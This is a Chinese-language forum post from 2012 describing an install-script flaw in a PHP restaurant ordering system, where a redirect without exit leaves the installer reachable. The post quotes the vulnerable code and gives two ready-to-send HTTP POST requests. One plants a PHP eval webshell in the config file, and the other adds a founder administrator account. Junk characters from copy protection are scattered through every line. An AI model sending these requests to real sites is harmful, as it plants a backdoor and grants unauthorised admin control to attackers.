问题出在/install/index.php文件。在程序安装完后,会在程序根目录下生成install.lock文件。而/install/index.php在判断是否有install.lock时出现错误。
% I3 b& T5 y: `$ v9 ]4 _7 |4 f& s6 U# H! b# q
<?php5 {0 ^6 x& b' u$ y2 w+ N
if(file_exists("../install.lock")) p8 w m- C& ?( r; b) y
{( D8 Z9 M" R3 j5 i- q9 m9 ]" J
header("Location: ../");//没有退出
" C$ b3 B: p1 k2 `; L2 c; k6 v) k}
1 ?' J: L( W5 g; P$ l8 H R( y ; ~$ O# R- A" D$ h7 U4 u+ w
//echo 'tst';exit;
0 i% u% {5 D4 _; `: \7 s0 G3 drequire_once("init.php");1 v1 z- T- u: r* \; }, Y
if(empty($_REQUEST['step']) || $_REQUEST['step']==1)
- S- w9 W# M: o6 H/ z; A3 G{5 G7 o2 U0 {/ U1 {3 \, @
可见在/install/index.php存在时,只是header做了302重定向并没有退出,也就是说下面的逻辑还是会执行的。在这里至少可以产生两个漏洞。' a( [) s, H6 }) x8 n9 D3 P
5 o9 k# e. i6 _
1、getshell(很危险); ^5 J z, ]2 S6 j9 i5 q: {' D, H
if(empty($_REQUEST['step']) || $_REQUEST['step']==1); T9 O- m9 t8 M! ^9 U* |
{
2 R& ]/ A* Z* B. i% q% t* J$smarty->assign("step",1);
5 E$ Z4 j4 |6 y3 k6 A' ?9 c$smarty->display("index.html");
2 `4 o* T2 m; Y1 B8 e2 x% N6 O}elseif($_REQUEST['step']==2)
! [, ?8 U* C' `) N6 Q% X+ x8 T$ H{
. C) r! X# U k4 L8 C1 ^* S $mysql_host=trim($_POST['mysql_host']);: t& Z3 V! I r1 \1 Q7 t1 B
$mysql_user=trim($_POST['mysql_user']);- o5 N a% S& F* ]2 X4 x
$mysql_pwd=trim($_POST['mysql_pwd']);0 {# E f3 T' y% I2 |' U% b
$mysql_db=trim($_POST['mysql_db']);$ M) ~7 d+ A3 v Y1 l3 k! _
$tblpre=trim($_POST['tblpre']);, K# E1 r! ^( B' W7 l7 J
$domain==trim($_POST['domain']);
! V4 O7 @7 i! |1 x; ]8 V1 Q7 s, v0 c $str="<?php \r\n";
6 I6 M; A0 j& K $str.='define("MYSQL_HOST","'.$mysql_host.'");'."\r\n";3 y, h& \" ~. @8 t. v
$str.='define("MYSQL_USER","'.$mysql_user.'");'."\r\n";
: b% n, W1 p$ u" P $str.='define("MYSQL_PWD","'.$mysql_pwd.'");'."\r\n";
{$ j3 n' L0 _+ r $str.='define("MYSQL_DB","'.$mysql_db.'");'."\r\n";
* P* G5 @! i$ f4 B+ f $str.='define("MYSQL_CHARSET","GBK");'."\r\n";
8 C0 f' G' l+ ~5 y $str.='define("TABLE_PRE","'.$tblpre.'");'."\r\n";
4 {- S& R% ~- ?0 l& e; p. k5 Z $str.='define("DOMAIN","'.$domain.'");'."\r\n";
4 F/ W6 J5 K1 b' V. V; j9 B' J3 H $str.='define("SKINS","default");'."\r\n";9 C5 h1 e& L, |4 \# C% N2 O
$str.='?>';
# X; ~5 Y* Y- t% n4 K2 m' [ file_put_contents("../config/config.inc.php",$str);//将提交的数据写入php文件
. L! m0 @, D ]上面的代码将POST的数据直接写入了../config/config.inc.php文件,那么我们提交如下POST包,即可获得一句话木马
) J8 l4 |8 w2 D6 l4 `4 r, oPOST /canting/install/index.php?m=index&step=2 HTTP/1.1
' N$ H+ K, r Q3 u/ KHost: 192.168.80.1296 t+ d- L2 T& y/ B5 l8 x; y7 q
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0. p; ? L% [; e! X* Y1 D# W
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8. h6 } b: J# A" S0 H. u4 H4 J' F
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3) [8 A& E$ }2 t }8 @+ a# G
Accept-Encoding: gzip, deflate ~0 k0 h L8 w5 ~& `" v7 z
Referer: http://192.168.80.129/canting/install/index.php?step=1
* Y6 s- I0 D5 N: P. s- VCookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42' d- _2 M1 L9 G- i
Content-Type: application/x-www-form-urlencoded
: B* ?% H* v/ p( x7 z$ k2 G) r6 P( WContent-Length: 126: o; ^' i: q2 C: F/ {( b3 ~) w
4 e" x! x( Q$ O# B( r/ Fmysql_host=test");@eval($_POST[x]);?>//&mysql_user=1&mysql_pwd=2&mysql_db=3&tblpre=koufu_&domain=www&button=%CF%C2%D2%BB%B2%BD9 Z2 |% N+ L5 J1 A# R7 J# ~
但是这个方法很危险,将导致网站无法运行。
. T* l! u5 l; h* S8 m) y+ j; H4 m
! N% [1 \2 a0 O/ F- g) G2、直接添加管理员
/ R& l& p* e0 a0 h& H4 h+ n# d( A4 ~0 E' ^, c
elseif($_REQUEST['step']==5)2 M( k# {$ p. O) }; V5 _
{4 z8 m5 S, S& B3 ^3 I9 _
if($_POST)6 `& X5 J0 R( k6 W- @& E+ y2 g
{ require_once("../config/config.inc.php");+ L7 i/ x Q- A5 S( x
$link=mysql_connect(MYSQL_HOST,MYSQL_USER,MYSQL_PWD);
% g) u& m4 ^) h+ K3 L mysql_select_db(MYSQL_DB,$link);* b0 H p& E$ F5 R1 d) p/ m
mysql_query("SET NAMES ".MYSQL_CHARSET );
k! H! F9 C# U# y% K, m, O" u* t mysql_query("SET sql_mode=''");0 l$ J: C; `# k9 v
+ j( S4 w6 ~8 Y: Y! M $adminname=trim($_POST['adminname']);: y+ V, o' C/ H* r) A
$pwd1=trim($_POST['pwd1']);
% p- J, A; f% N1 D& I $pwd2=trim($_POST['pwd2']); s! c" r. E9 q, Z5 L
if(empty($adminname))) }# ^1 j% C0 _ m! l% B2 x1 a
{1 M6 x# O2 g7 N1 A% e0 `7 B
6 r. B W+ @+ Z. p; d4 s& ~# t) E echo "<script>alert('管理员不能为空');history.go(-1);</script>";
4 \; l/ A2 z U" i- W# H3 Z. y exit();
5 O% V0 d( V z2 d+ n* l }, ~5 R. s( _4 |, }
if(($pwd1!=$pwd2) or empty($pwd1))& d; t4 d, I$ w" i4 ~* X$ s k
{- [3 C# Y4 u, G5 j6 @+ |! m0 R- @
echo "<script>alert('两次输入的密码不一致');history.go(-1);</script>";//这里也是没有退出8 L9 m2 c) B6 |
}0 H1 ?. M( A" X: ~" E" b3 Y& {8 E
mysql_query("insert into ".TABLE_PRE."admin(adminname,password,isfounder) values('$adminname','".umd5($pwd1)."',1)");//直接可以插入一个管理员 `' }0 q/ A' l7 j4 u9 c
}
9 U9 q' ^. h- H; Z& z这样的话我们就可以直接插入一个qingshen/qingshen的管理员帐号,语句如下:
5 S3 g1 C5 |$ H. z; gPOST /canting/install/index.php?m=index&step=5 HTTP/1.1
! f! h5 I/ G' _% t0 ]# T% F# xHost: 192.168.80.129
8 H3 v2 D6 a, i2 D/ OUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0; t+ g" J' [' K
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.87 S2 c1 y% q6 U0 o
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
, k: \" L, ]2 ^ N0 l5 gAccept-Encoding: gzip, deflate2 G; y7 w4 t9 A8 ?
Referer: http://www.2cto.com /canting/install/index.php?step=1. R$ p, T1 o! t8 M a& O: H
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
9 b* J- s5 @1 M9 hContent-Type: application/x-www-form-urlencoded
9 a. e. T4 i% SContent-Length: 46$ F- _ R6 F) j+ x) u$ U) K( [
0 N1 Q, N* w: Kadminname=qingshen&pwd1=qingshen&pwd2=qingshen; ?- E. R* Z) E5 [& K: ?4 h2 V
|
发表于 2012-12-4 11:13:44
收藏
支持
反对